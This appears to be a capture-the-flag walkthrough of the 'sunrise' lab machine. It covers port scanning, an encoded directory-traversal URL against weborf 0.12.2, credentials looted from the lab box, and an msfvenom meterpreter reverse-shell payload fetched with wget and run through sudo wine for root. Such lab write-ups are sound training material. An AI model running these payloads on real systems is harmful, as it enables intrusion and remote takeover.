Good day, today I will walkthrough sunrise from a series of sunset machines.
Explor1ng
First, scan open ports
![](../img/post5/image1.png)
arp-scan -l
nmap 192.168.2.103
Boot2User
On port 80, I see an apache server with the default nginx file, but on port 8080 another web server is working that looks vulnerable, let's check it.
![](../img/post5/image2.png)
After scanning server, I find the vulnerability "weborf 0.12.2 - Directory Traversal"
![](../img/post5/image3.png)
In the passwd file you can see the names of 2 users(sunrise and weborf).
![](../img/post5/image4.png)
To find hidden files in the weborf server home directory using web vulnerabilities i use dirb.
![](../img/post5/image5.png)
dirb http://192.168.2.103:8080/%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/
Excellent in mysql history file i found server credentials and now I can log in via ssh.
![](../img/post5/image6.png)
weborf:iheartrainbows44
Sunrise
Using credentials, I log in to mysql. After that, I find sunrise user credentials in mysql database.
![](../img/post5/image7.png)
mysql -u weborf -p<
show databases;
use mysql;
SHOW tables;
SHOW COLUMNS FROM user;
SELECT User FROM user;
SELECT Password FROM user;
Now you can log in via ssh as with user rights sunrise.
![](../img/post5/image8.png)
sunrise:thefutureissobrightigottawearshades
Boot2Root
Using the sudo -l command, I see that I can run wine with root privileges.
![](../img/post5/image9.png)
sudo -l
Since wine is designed to run files with the .exe extension, I will generate paylod for windows using msfvenom. After generating payload, I move it using the apache2 server.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.100 LPORT=1313 -f exe > shell.exe
service apache2 start
wget http://192.168.2.100/shell.exe
After running shell.exe I get root access.
![](../img/post5/image11.png)
And here is the root flag
![](../img/post5/image12.png)